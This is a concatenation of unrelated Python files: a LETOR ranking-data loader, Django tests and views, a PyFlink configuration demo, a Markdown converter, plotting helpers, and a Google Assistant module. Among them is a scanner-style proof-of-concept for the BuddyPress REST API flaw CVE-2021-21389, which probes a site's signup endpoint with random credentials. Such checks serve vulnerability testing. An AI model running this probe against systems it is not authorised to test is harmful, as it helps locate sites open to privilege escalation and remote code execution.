doc_feat = self.doc_feat(query_index, doc_index)
feat_i = np.where(doc_feat)[0]
doc_str = ''
for f_i in feat_i:
doc_str += '%s:%f ' % (self.datafold.feature_map[f_i], doc_feat[f_i])
return doc_str
class DataFold(object):
def __init__(self, dataset, fold_num, data_path):
self.name = dataset.name
self.num_rel_labels = dataset.num_rel_labels
self.num_features = dataset.num_features
self.fold_num = fold_num
self.data_path = data_path
self._data_ready = False
self.store_pickle_after_read = dataset.store_pickle_after_read
self.read_from_pickle = dataset.read_from_pickle
self.feature_normalization = dataset.feature_normalization
self.purge_test_set = dataset.purge_test_set
self._num_nonzero_feat = dataset._num_nonzero_feat
def max_query_size(self):
return np.amax((
self.train.max_query_size(),
self.validation.max_query_size(),
self.test.max_query_size(),
),)
def data_ready(self):
return self._data_ready
def clean_data(self):
del self.train
del self.validation
del self.test
self._data_ready = False
gc.collect()
def _read_file(self, path, feat_map, purge):
'''
Read letor file.
'''
queries = []
cur_docs = []
cur_labels = []
current_qid = None
for line in open(path, 'r'):
info = line[:line.find('#')].split()
qid = info[1].split(':')[1]
label = int(info[0])
feat_pairs = info[2:]
if current_qid is None:
current_qid = qid
elif current_qid != qid:
stacked_documents = np.stack(cur_docs, axis=0)
if self.feature_normalization:
stacked_documents -= np.amin(stacked_documents, axis=0)[None, :]
safe_max = np.amax(stacked_documents, axis=0)
safe_max[safe_max == 0] = 1.
stacked_documents /= safe_max[None, :]
np_labels = np.array(cur_labels, dtype=np.int64)
if not purge or np.any(np.greater(np_labels, 0)):
queries.append(
{
'qid': current_qid,
'n_docs': stacked_documents.shape[0],
'labels': np_labels,
'documents': stacked_documents
}
)
current_qid = qid
cur_docs = []
cur_labels = []
doc_feat = np.zeros(self._num_nonzero_feat)
for pair in feat_pairs:
feat_id, feature = pair.split(':')
feat_id = int(feat_id)
feat_value = float(feature)
if feat_id not in feat_map:
feat_map[feat_id] = len(feat_map)
assert feat_map[feat_id] < self._num_nonzero_feat, '%s features found but %s expected' % (feat_map[feat_id], self._num_nonzero_feat)
doc_feat[feat_map[feat_id]] = feat_value
cur_docs.append(doc_feat)
cur_labels.append(label)
all_docs = np.concatenate([x['documents'] for x in queries], axis=0)
all_n_docs = np.array([x['n_docs'] for x in queries], dtype=np.int64)
all_labels = np.concatenate([x['labels'] for x in queries], axis=0)
query_ranges = _add_zero_to_vector(np.cumsum(all_n_docs))
return query_ranges, all_docs, all_labels
def _create_feature_mapping(self, feature_dict):
total_features = 0
feature_map = {}
for fid in feature_dict:
if fid not in feature_map:
feature_map[fid] = total_features
total_features += 1
return feature_map
def _normalize_feat(self, query_ranges, feature_matrix):
non_zero_feat = np.zeros(feature_matrix.shape[1], dtype=bool)
for qid in range(query_ranges.shape[0]-1):
s_i, e_i = query_ranges[qid:qid+2]
cur_feat = feature_matrix[s_i:e_i,:]
min_q = np.amin(cur_feat, axis=0)
max_q = np.amax(cur_feat, axis=0)
cur_feat -= min_q[None, :]
denom = max_q - min_q
denom[denom == 0.] = 1.
cur_feat /= denom[None, :]
non_zero_feat += np.greater(max_q, min_q)
return non_zero_feat
def read_data(self):
"""
Reads data from a fold folder (letor format).
"""
data_read = False
if self.feature_normalization and self.purge_test_set:
pickle_name = 'binarized_purged_querynorm.npz'
elif self.feature_normalization:
pickle_name = 'binarized_querynorm.npz'
elif self.purge_test_set:
pickle_name = 'binarized_purged.npz'
else:
pickle_name = 'binarized.npz'
pickle_path = self.data_path + pickle_name
train_raw_path = self.data_path + 'train.txt'
valid_raw_path = self.data_path + 'vali.txt'
test_raw_path = self.data_path + 'test.txt'
if self.read_from_pickle and os.path.isfile(pickle_path):
loaded_data = np.load(pickle_path, allow_pickle=True)
if loaded_data['format_version'] == FOLDDATA_WRITE_VERSION:
feature_map = loaded_data['feature_map'].item()
train_feature_matrix = loaded_data['train_feature_matrix']
train_doclist_ranges = loaded_data['train_doclist_ranges']
train_label_vector = loaded_data['train_label_vector']
valid_feature_matrix = loaded_data['valid_feature_matrix']
valid_doclist_ranges = loaded_data['valid_doclist_ranges']
valid_label_vector = loaded_data['valid_label_vector']
test_feature_matrix = loaded_data['test_feature_matrix']
test_doclist_ranges = loaded_data['test_doclist_ranges']
test_label_vector = loaded_data['test_label_vector']
data_read = True
del loaded_data
if not data_read:
feature_map = {}
(train_doclist_ranges,
train_feature_matrix,
train_label_vector) = self._read_file(train_raw_path,
feature_map,
False)
(valid_doclist_ranges,
valid_feature_matrix,
valid_label_vector) = self._read_file(valid_raw_path,
feature_map,
False)
(test_doclist_ranges,
test_feature_matrix,
test_label_vector) = self._read_file(test_raw_path,
feature_map,
self.purge_test_set)
assert len(feature_map) == self._num_nonzero_feat, '%d non-zero features found but %d expected' % (len(feature_map), self._num_nonzero_feat)
if self.feature_normalization:
non_zero_feat = self._normalize_feat(train_doclist_ranges,
train_feature_matrix)
self._normalize_feat(valid_doclist_ranges,
valid_feature_matrix)
self._normalize_feat(test_doclist_ranges,
test_feature_matrix)
list_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
filtered_list_map = [x for i, x in enumerate(list_map) if non_zero_feat[i]]
feature_map = {}
for i, x in enumerate(filtered_list_map):
feature_map[x] = i
train_feature_matrix = train_feature_matrix[:, non_zero_feat]
valid_feature_matrix = valid_feature_matrix[:, non_zero_feat]
test_feature_matrix = test_feature_matrix[:, non_zero_feat]
# sort found features so that feature id ascends
sorted_map = sorted(feature_map.items())
transform_ind = np.array([x[1] for x in sorted_map])
train_feature_matrix = train_feature_matrix[:, transform_ind]
valid_feature_matrix = valid_feature_matrix[:, transform_ind]
test_feature_matrix = test_feature_matrix[:, transform_ind]
feature_map = {}
for i, x in enumerate([x[0] for x in sorted_map]):
feature_map[x] = i
if self.store_pickle_after_read:
np.savez_compressed(pickle_path,
format_version = FOLDDATA_WRITE_VERSION,
feature_map = feature_map,
train_feature_matrix = train_feature_matrix,
train_doclist_ranges = train_doclist_ranges,
train_label_vector = train_label_vector,
valid_feature_matrix = valid_feature_matrix,
valid_doclist_ranges = valid_doclist_ranges,
valid_label_vector = valid_label_vector,
test_feature_matrix = test_feature_matrix,
test_doclist_ranges = test_doclist_ranges,
test_label_vector = test_label_vector,
)
n_feat = len(feature_map)
assert n_feat == self.num_features, '%d features found but %d expected' % (n_feat, self.num_features)
self.inverse_feature_map = feature_map
self.feature_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
self.train = DataFoldSplit(self,
'train',
train_doclist_ranges,
train_feature_matrix,
train_label_vector)
self.validation = DataFoldSplit(self,
'validation',
valid_doclist_ranges,
valid_feature_matrix,
valid_label_vector)
self.test = DataFoldSplit(self,
'test',
test_doclist_ranges,
test_feature_matrix,
test_label_vector)
self._data_ready = True
|
python
|
from django.test import TestCase
from django.urls import reverse
from .models import Post
# Create your tests here.
class PostModelTest(TestCase):
def setUp(self):
Post.objects.create(title='Mavzu', text='yangilik matni')
def test_text_content(self):
post = Post.objects.get(id=1)
expected_object_title = f'{post.title}'
expected_object_text = f'{post.text}'
self.assertEqual(expected_object_title, 'Mavzu')
self.assertEqual(expected_object_text, 'yangilik matni')
class HomePageViewTest(TestCase):
def setUp(self):
Post.objects.create(title='Mavzu 2', text='boshqa yangilik')
def test_views_url_exists_at_proper_location(self):
resp = self.client.get('/')
self.assertEqual(resp.status_code, 200)
def test_view_url_by_name(self):
resp = self.client.get(reverse('home'))
self.assertEqual(resp.status_code, 200)
def test_view_uses_correct_template(self):
resp = self.client.get(reverse('home'))
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, 'home.html')
|
python
|
from django.shortcuts import render, redirect, get_object_or_404
from .models import BlogPost as blog
from .models import Comment
from .forms import CreateCommentForm, UpdateCommentForm
# Create your views here.
def post_view(request):
qs=blog.objects.all()
context = {
'qs' : qs,
}
return render(request, 'blog/main.html', context)
def detail_blog_view(request, slug):
context = {}
blog_post = get_object_or_404(blog, slug=slug)
comments = Comment.objects.filter(blog=blog_post)
context['blog_post'] = blog_post
context['comments'] = comments
context['visible'] = True
user = request.user
context['user'] = user.username
if not user.is_authenticated:
context['visible'] = False
form = CreateCommentForm(request.POST or None, request.FILES or None)
if form.is_valid():
obj = form.save(commit=False)
obj.blog = blog_post
obj.author = user
obj.save()
form = CreateCommentForm()
context['form'] = form
return render(request, 'blog/detail_blog.html', context)
def update_comment_view(request, id):
com = get_object_or_404(Comment, id=id)
context = {}
form = UpdateCommentForm()
if request.POST:
form = UpdateCommentForm(request.POST or None, request.FILES or None, instance=com)
if form.is_valid():
form.initial = {
"body":request.POST['body']
}
form.save()
return redirect('/blog1/' + com.blog.slug)
else:
form = UpdateCommentForm(
initial={
'body':com.body
}
)
print(com.body)
context['form'] = form
return render(request, "blog/edit_comment.html", context)
|
python
|
from pyflink.common import ExecutionMode, RestartStrategies
from pyflink.common.serialization import JsonRowDeserializationSchema
from pyflink.common.typeinfo import Types
from pyflink.dataset import ExecutionEnvironment
from pyflink.datastream import StreamExecutionEnvironment, CheckpointingMode, ExternalizedCheckpointCleanup, TimeCharacteristic, RocksDBStateBackend
from pyflink.datastream.connectors import FlinkKafkaConsumer
def demo01():
# 创建一个执行环境,该环境表示程序当前正在执行。如果程序是独立调用的,则方法返回本地执行环境。
# 1:创建一个流处理的执行环境,如果在本地启动则创建本地执行环境,如果在集群启动则创建集群执行环境
env = StreamExecutionEnvironment.get_execution_environment()
# 添加添加到程序的每个用户代码类加载器的类路径中的url列表。路径必须指定一个协议(例如file://),并且可以在所有节点上访问
env.add_classpaths("file://lib")
# 添加将被上传到集群并由作业引用的jar文件列表。 .set_string("pipeline.jars", 'file://' + dir_kafka_sql_connect)
env.add_jars("file://jars")
# 添加python存档文件。该文件将被解压到python UDF worker的工作目录中。
# 目前只支持zip格式,例如zip、jar、whl、egg等
# 会先解压zip -r py_env.zip py_env.zip
env.add_python_archive("py_env.zip")
# 如果python UDF依赖于集群中不存在的特定python版本,则可以使用此方法上传虚拟环境。注意,上传环境中包含的python解释器的路径应该通过该方法指定
env.set_python_executable("py_env.zip/py_env/bin/python")
# con/flink-conf.yaml 添加 python.client.executable: /usr/bin/python3
# or
env.add_python_archive("py_env.zip", "myenv")
env.set_python_executable("myenv/py_env/bin/python")
# the files contained in the archive file can be accessed in UDF
"""
def my_udf():
with open("myenv/py_env/data/data.txt") as f:
...
"""
# 相当于 pip download -d cached_dir -r requirements.txt --no-binary :all:
env.set_python_requirements("requirements.txt", "cached_dir")
# 添加一个python依赖项,它可以是python文件、python包或本地目录。它们将被添加到python UDF工作者的PYTHONPATH中。请确保可以导入这些依赖项。
env.add_python_file("")
# 添加source
#1. add_source
ds = env.add_source(
FlinkKafkaConsumer(
"source_topic",
JsonRowDeserializationSchema.builder().type_info(type_info=Types.ROW([Types.INT(), Types.STRING()])).build(),
{'bootstrap.servers': 'localhost:9092', 'group.id': 'test_group'})
)
# 2. from_collection
ds = env.from_collection([1,2,3,], Types.INT())
# 3. 从文件
ds = env.read_text_file("hdfs://host:port/file/path")
# 禁用operator chaining
env.disable_operator_chaining()
"""
Flink 可以非常高效的进行有状态流的计算,通过使用 Flink 内置的 Keyed State 和 Operator State,保存每个算子的状态。
默认情况下,状态是存储在 JVM 的堆内存中,如果系统中某个环节发生了错误,宕机,这个时候所有的状态都会丢失,并且无法恢复,会导致整个系统的数据计算发生错误。
此时就需要 Checkpoint 来保障系统的容错。Checkpoint 过程,就是把算子的状态周期性持久化的过程。
在系统出错后恢复时,就可以从 checkpoint 中恢复每个算子的状态,从上次消费的地方重新开始消费和计算。从而可以做到在高效进行计算的同时还可以保证数据不丢失,只计算一次。
最少一次
AT_LEAST_ONCE
如果假定是传输过程出现问题,而服务器没有收到数据,这样time out之后重传数据。但这可能是返回成功消息的时候出问题,而此时服务器已经收到数据,这样会因为重传而收到多份数据,这就是 at least once
严格一次
EXACTLY_ONCE
最多一次(At-most-once)、最少一次(At-least-once),以及严格一次(Exactly-once)
Checkpoint 必要的两个条件
1. 需要支持重放一定时间范围内数据的数据源,比如:kafka 。
因为容错机制就是在任务失败后自动从最近一次成功的 checkpoint 处恢复任务,此时需要把任务失败前消费的数据再消费一遍。
假设数据源不支持重放,那么数据还未写到存储中就丢了,任务恢复后,就再也无法重新消费这部分丢了的数据了。
2. 需要一个存储来保存持久化的状态,如:Hdfs,本地文件。可以在任务失败后,从存储中恢复 checkpoint 数据。
https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/stream/state/checkpointing.html
https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.datastream.html#pyflink.datastream.CheckpointConfig
"""
# 每 300s 做一次 checkpoint
env.enable_checkpointing(300000, CheckpointingMode.AT_LEAST_ONCE)
# MemoryStateBackend FsStateBackend CustomStateBackend
env.set_state_backend(RocksDBStateBackend("file://var/checkpoints/"))
# set mode to exactly-once (this is the default)
env.get_checkpoint_config().set_checkpointing_mode(CheckpointingMode.EXACTLY_ONCE)
# 两次 checkpoint 的间隔时间至少为 500ms,默认是 0,立即进行下一次 checkpoint make sure 500 ms of progress happen between checkpoints
env.get_checkpoint_config().set_min_pause_between_checkpoints(500)
# checkpoint 必须在 60s 内结束,否则被丢弃 checkpoints have to complete within one minute, or are discarded
env.get_checkpoint_config().set_checkpoint_timeout(60000)
# 同一时间只能允许有一个 checkpoint allow only one checkpoint to be in progress at the same time
env.get_checkpoint_config().set_max_concurrent_checkpoints(1)
# 当 Flink 任务取消时,保留外部保存的 checkpoint 信息 enable externalized checkpoints which are retained after job cancellation
env.get_checkpoint_config().enable_externalized_checkpoints(ExternalizedCheckpointCleanup.RETAIN_ON_CANCELLATION)
# 当有较新的 Savepoint 时,作业也会从 Checkpoint 处恢复 allow job recovery fallback to checkpoint when there is a more recent savepoint
env.get_checkpoint_config().set_prefer_checkpoint_for_recovery(True)
# 允许实验性的功能:非对齐的 checkpoint,以提升性能 enables the experimental unaligned checkpoints
# CheckpointingMode.EXACTLY_ONCE时才能启用
env.get_checkpoint_config().enable_unaligned_checkpoints()
# env.get_checkpoint_config().disable_unaligned_checkpoints() 等同env.get_checkpoint_config().enable_unaligned_checkpoints(False)
env.get_checkpoint_interval() #等同 env.get_checkpoint_config().get_checkpoint_interval()
"""
"""
# https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.common.html#pyflink.common.ExecutionConfig
# bin/flink run -Dexecution.runtime-mode=BATCH examples/streaming/WordCount.jar
env.get_config().set_execution_mode(ExecutionMode.BATCH)
env.get_config().disable_auto_generated_uids()# enable_auto_generated_uids
# 自己设置uid
ds.uid("xx")
# 设置从此环境创建的所有流的时间特性,例如,处理时间、事件时间或摄取时间。
# 如果将特征设置为EventTime的incertiontime,则将设置默认值水印更新间隔为200毫秒。
env.set_stream_time_characteristic(TimeCharacteristic.EventTime) #设置时间分配器
env.get_config().set_auto_watermark_interval(200) # 每200ms发出一个watermark
env.get_config().set_global_job_parameters({"environment.checkpoint_interval": "1000"})
env.get_config().set_restart_strategy(RestartStrategies.fixed_delay_restart(10, 1000))
# 执行
env.execute("job name")
# 异步执行
jobClient = env.execute_async("job name")
jobClient.get_job_execution_result().result()
"""
设置输出缓冲区刷新的最大时间频率(毫秒)。默认情况下,输出缓冲区会频繁刷新,以提供较低的延迟,并帮助流畅的开发人员体验。设置该参数可以产生三种逻辑模式:
正整数触发该整数周期性刷新
0 触发每个记录之后的刷新,从而最大限度地减少延迟(最好不要设置为0 可以设置一个接近0的数值,比如5或者10)
-1 仅在输出缓冲区已满时才触发刷新,从而最大化吞吐量
"""
# 输出缓冲区刷新的最大时间频率(毫秒)
env.get_buffer_timeout()
env.set_buffer_timeout(10)
# 获取执行计划的json,复制到https://flink.apache.org/visualizer/
env.get_execution_plan()
# https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.datastream.html
if __name__ == '__main__':
demo01()
|
python
|
import sys
import os
from bs4 import BeautifulSoup
import markdown
"""
将 Markdown 转换为 HTML
"""
class MarkdownToHtml:
headTag = '<head><meta charset="utf-8" /></head>'
def __init__(self,cssFilePath = None):
if cssFilePath != None:
self.genStyle(cssFilePath)
def genStyle(self,cssFilePath):
with open(cssFilePath,'r') as f:
cssString = f.read()
self.headTag = self.headTag[:-7] + '<style type="text/css">{}</style>'.format(cssString) + self.headTag[-7:]
def markdownToHtml(self, sourceFilePath, destinationDirectory = None, outputFileName = None):
if not destinationDirectory:
# 未定义输出目录则将源文件目录(注意要转换为绝对路径)作为输出目录
destinationDirectory = os.path.dirname(os.path.abspath(sourceFilePath))
if not outputFileName:
# 未定义输出文件名则沿用输入文件名
outputFileName = os.path.splitext(os.path.basename(sourceFilePath))[0] + '.html'
if destinationDirectory[-1] != '/':
destinationDirectory += '/'
with open(sourceFilePath,'r', encoding='utf8') as f:
markdownText = f.read()
# 编译出原始 HTML 文本
rawHtml = self.headTag + markdown.markdown(markdownText,output_format='html5')
# 格式化 HTML 文本为可读性更强的格式
beautifyHtml = BeautifulSoup(rawHtml,'html5lib').prettify()
with open(destinationDirectory + outputFileName, 'w', encoding='utf8') as f:
f.write(beautifyHtml)
if __name__ == "__main__":
mth = MarkdownToHtml()
# 做一个命令行参数列表的浅拷贝,不包含脚本文件名
argv = sys.argv[1:]
# 目前列表 argv 可能包含源文件路径之外的元素(即选项信息)
# 程序最后遍历列表 argv 进行编译 markdown 时,列表中的元素必须全部是源文件路径
outputDirectory = None
if '-s' in argv:
cssArgIndex = argv.index('-s') +1
cssFilePath = argv[cssArgIndex]
# 检测样式表文件路径是否有效
if not os.path.isfile(cssFilePath):
print('Invalid Path: '+cssFilePath)
sys.exit()
mth.genStyle(cssFilePath)
# pop 顺序不能随意变化
argv.pop(cssArgIndex)
argv.pop(cssArgIndex-1)
if '-o' in argv:
dirArgIndex = argv.index('-o') +1
outputDirectory = argv[dirArgIndex]
# 检测输出目录是否有效
if not os.path.isdir(outputDirectory):
print('Invalid Directory: ' + outputDirectory)
sys.exit()
# pop 顺序不能随意变化
argv.pop(dirArgIndex)
argv.pop(dirArgIndex-1)
# 至此,列表 argv 中的元素均是源文件路径
# 遍历所有源文件路径
for filePath in argv:
# 判断文件路径是否有效
if os.path.isfile(filePath):
mth.markdownToHtml(filePath, outputDirectory)
else:
print('Invalid Path: ' + filePath)
|
python
|
import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
def setup_axes(diff=False):
fig = plt.figure()
axes = []
if diff:
gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
main_axis = plt.subplot(gs[0])
axes.append(plt.subplot(gs[0]))
axes.append(plt.subplot(gs[1], sharex=main_axis))
else:
axes.append(plt.subplot())
return fig, axes
def layout_main_and_diff_axis(fig, axes):
main_axis, diff_axis = axes
fig.subplots_adjust(hspace=0.0)
main_axis.spines['bottom'].set_visible(False)
plt.setp(main_axis.get_xticklabels(), visible=False)
main_axis.set_xlabel('')
diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
legend = axis.legend(loc=loc,
title=title,
borderaxespad=borderpad,
framealpha=0.8,
frameon=draws_background,
fancybox=draws_background)
legend.get_frame().set_color((0.96,0.96,0.96))
for line in legend.get_lines():
line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
'right': 5, 'center left': 6,'center right': 7,
'lower center': 8, 'upper center': 9, 'center': 10}
at = AnchoredText(annotation,
codes[loc],
frameon=False,
borderpad=borderpad,
prop=dict(linespacing=2.5))
axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
interval = axis.get_view_interval()
ticks_in_view_interval = []
for tick, loc in zip(axis.get_major_ticks(),
axis.get_major_locator()()):
if mtransforms.interval_contains(interval, loc):
ticks_in_view_interval.append(tick)
return ticks_in_view_interval
def set_figure_size_with_width(width):
params = {'figure.figsize': figure_size_from_width(width)}
plt.rcParams.update(params)
def figure_size_from_width(width):
"""Returns a single plot figure size in inches given a width in points"""
inches_per_point = 1.0/72.27
golden_mean = (math.sqrt(5)-1.0)/2.0
inches_width = width * inches_per_point
fig_height = inches_width*golden_mean
return [inches_width,fig_height]
|
python
|
from rest_framework import serializers
from polyclinics.models import Poly
class PolySerializer(serializers.ModelSerializer):
class Meta:
model = Poly
fields = '__all__'
|
python
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''BuddyPress REST API Privilege Escalation to RCE''',
"description": '''The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE''',
"severity": "high",
"references": [
"https://github.com/HoangKien1020/CVE-2021-21389",
"https://buddypress.org/2021/03/buddypress-7-2-1-security-release/",
"https://codex.buddypress.org/releases/version-7-2-1/",
"https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-21389",
"cwe-id": "CWE-863"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "wordpress", "wp-plugin", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/wp-json/buddypress/v1/signup"""
method = "POST"
data = """{
"user_login":"{{randstr}}",
"password":"{{randstr}}",
"user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com"
}"""
headers = {'Content-Type': 'application/json; charset=UTF-8'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""user_login""" in resp0.text and """registered""" in resp0.text and """activation_key""" in resp0.text and """user_email""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
python
|
#!/usr/bin/env python
# Copyright (C) 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os.path
from resources.lib.utils import import_or_install, json, PlayerMetaData, PLATFORM, PLAYING_STATES, PLAYING_STATE, LISTENING_STATE, IDLE_STATE, NOTIFY_STATE, ALERT_STATE, SPEAKING_STATE
import threading
import sys
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
def setup(monitor):
'''setup the module'''
if not "armv7" in PLATFORM:
LOGGER.warning("unsupported platform! %s" % PLATFORM)
return False
enabled = monitor.config.get("ENABLE_MODULE_GOOGLE_ASSISTANT", False)
if not enabled:
LOGGER.debug("Google Assistant module is not enabled!")
return False
dummy_mic = "Dummy" in monitor.config["ALSA_CAPTURE_DEVICE"]
mute_mic = monitor.config.get("GOOGLE_ASSISTANT_MUTE_MIC", dummy_mic)
import_or_install("pathlib2", "pathlib", installpip="pathlib2")
import_or_install("google.assistant.library", "Assistant", True, installpip="google-assistant-library google-assistant-sdk[samples]", installapt="portaudio19-dev libffi-dev libssl-dev")
import_or_install("google.assistant.library.event", "EventType", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.file_helpers", "existing_file", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.device_helpers", "register_device", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.oauth2.credentials", "Credentials", True, installpip="google-auth-oauthlib[tool]")
model_id="voice-kit-208321-voice-kit-kftedd"
project_id="voice-kit-208321"
client_secrets = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..","resources", "googlecreds.json")
credentialsfile = None
devconfig_file = None
return GoogleAssistantPlayer(credentialsfile, model_id, project_id, devconfig_file, client_secrets, monitor, mute_mic)
class GoogleAssistantPlayer(threading.Thread):
_exit = threading.Event()
_assistant = None
def command(self, cmd, cmd_data=None):
if not self._assistant:
return False
if self.monitor.states["google_assistant"]["state"] == PLAYING_STATE:
if cmd == "pause":
self._assistant.send_text_query("pause")
return True
elif cmd == "stop":
self._assistant.send_text_query("stop")
return True
else:
return False
elif cmd == "broadcast":
self._assistant.send_text_query("broadcast %s" % cmd_data)
return True
else:
return False
def process_event(self, event):
"""Pretty prints events.
Prints all events that occur with two spaces between each new
conversation and a single space between turns of a conversation.
Args:
event(event.Event): The current event to process.
"""
LOGGER.debug("Google received event: %s" % event)
if event.type == EventType.ON_START_FINISHED:
LOGGER.info("Google Assistant is now ready for commands (waiting for hotword)")
self._assistant.send_text_query("set volume to 100 percent")
elif event.type in [EventType.ON_CONVERSATION_TURN_STARTED]:
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
self.monitor.command("system", "ping")
LOGGER.info("Google Assistant is now listening for a command (hotword detected)")
elif event.type in [EventType.ON_ALERT_STARTED]:
self.monitor.states["google_assistant"]["state"] = ALERT_STATE
LOGGER.info("Google Assistant is now broadcasting an alert")
elif event.type == EventType.ON_RENDER_RESPONSE:
self.monitor.states["google_assistant"]["title"] = event.args.get("text","")
elif event.type in [EventType.ON_RESPONDING_STARTED]:
self.monitor.states["google_assistant"]["state"] = SPEAKING_STATE
LOGGER.info("Google Assistant is talking a response")
elif event.type in [EventType.ON_MEDIA_TRACK_PLAY]:
self.monitor.states["google_assistant"]["state"] = PLAYING_STATE
LOGGER.info("Google Assistant is playing media")
elif event.type in [EventType.ON_ALERT_FINISHED,
EventType.ON_CONVERSATION_TURN_TIMEOUT,
EventType.ON_RESPONDING_FINISHED,
EventType.ON_MEDIA_TRACK_STOP,
EventType.ON_CONVERSATION_TURN_FINISHED]:
# check for follow-up
if event.type == EventType.ON_CONVERSATION_TURN_FINISHED:
if event.args and event.args['with_follow_on_turn']:
# the mic is listening again for follow-up
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
return
# return to idle
self.monitor.states["google_assistant"]["state"] = IDLE_STATE
elif event.type == EventType.ON_DEVICE_ACTION:
for command, params in event.actions:
LOGGER.info("Do command %s - with params: %s" % (command, params))
def authenticate_device(self):
import google_auth_oauthlib.flow
scopes = ["https://www.googleapis.com/auth/assistant-sdk-prototype", "https://www.googleapis.com/auth/gcm"]
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
flow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(
self.client_secrets,
scopes=scopes
)
flow.redirect_uri = flow._OOB_REDIRECT_URI
auth_url, _ = flow.authorization_url()
LOGGER.info("######################################################################################")
LOGGER.info("# Registering Google Assistant #")
LOGGER.info('# Please visit the url below in your browser and #')
LOGGER.info('# paste the resulting code in the web configuration #')
LOGGER.info('# There will be a new setting added, called "GOOGLE ASSISTANT AUTH CODE" #')
LOGGER.info('# #')
LOGGER.info(' ')
LOGGER.info(' %s' % auth_url)
LOGGER.info(' ')
LOGGER.info("######################################################################################")
self.monitor.states["messages"].append("Google Assistant needs to be registered. See the log for details.")
code = None
while not code and not self._exit.is_set():
code = self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"]
if code:
flow.fetch_token(code=code)
LOGGER.info("Device is registered succesfully!")
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
creds = flow.credentials
creds_data = {
'token': creds.token,
'refresh_token': creds.refresh_token,
'token_uri': creds.token_uri,
'client_id': creds.client_id,
'client_secret': creds.client_secret,
'scopes': creds.scopes
}
del creds_data['token']
config_path = os.path.dirname(self.credentialsfile)
if not os.path.isdir(config_path):
os.makedirs(config_path)
with open(self.credentialsfile, 'w') as outfile:
json.dump(creds_data, outfile)
LOGGER.debug("Credentials saved to %s" % self.credentialsfile)
def __init__(self, credentialsfile=None, model_id=None, project_id=None, devconfig_file=None, client_secrets=None, monitor=None, mic_muted=False):
if not credentialsfile:
credentialsfile = os.path.join(os.path.expanduser('~/.config'), 'google-oauthlib-tool','credentials.json')
self.credentialsfile = credentialsfile
if not devconfig_file:
devconfig_file = os.path.join(os.path.expanduser('~/.config'), 'googlesamples-assistant','device_config_library.json')
device_model_id = None
last_device_id = None
try:
with open(devconfig_file) as f:
device_config = json.load(f)
device_model_id = device_config['model_id']
last_device_id = device_config.get('last_device_id', None)
except FileNotFoundError:
LOGGER.warning("device config file not found")
if not model_id and not device_model_id:
raise Exception('Missing --device-model-id option')
# Re-register if "device_model_id" is given by the user and it differs
# from what we previously registered with.
should_register = (
model_id and model_id != device_model_id)
self.device_model_id = model_id or device_model_id
self.devconfig_file = devconfig_file
self.last_device_id = last_device_id
self.project_id = project_id
self.should_register = should_register
self.mic_muted = mic_muted
self.monitor = monitor
self.client_secrets = client_secrets
if monitor:
self.monitor.states["google_assistant"] = PlayerMetaData("Google Assistant")
threading.Thread.__init__(self)
def stop(self):
self._exit.set()
if self._assistant:
self._assistant.send_text_query("exit")
threading.Thread.join(self, 2)
def run(self):
if not os.path.isfile(self.credentialsfile):
# we should authenticate
self.authenticate_device()
if not os.path.isfile(self.credentialsfile):
return
with open(self.credentialsfile, 'r') as f:
self.credentials = Credentials(token=None, **json.load(f))
with Assistant(self.credentials, self.device_model_id) as assistant:
events = assistant.start()
assistant.set_mic_mute(self.mic_muted)
device_id = assistant.device_id
LOGGER.info('device_model_id: %s' % self.device_model_id)
LOGGER.info('device_id: %s' % device_id)
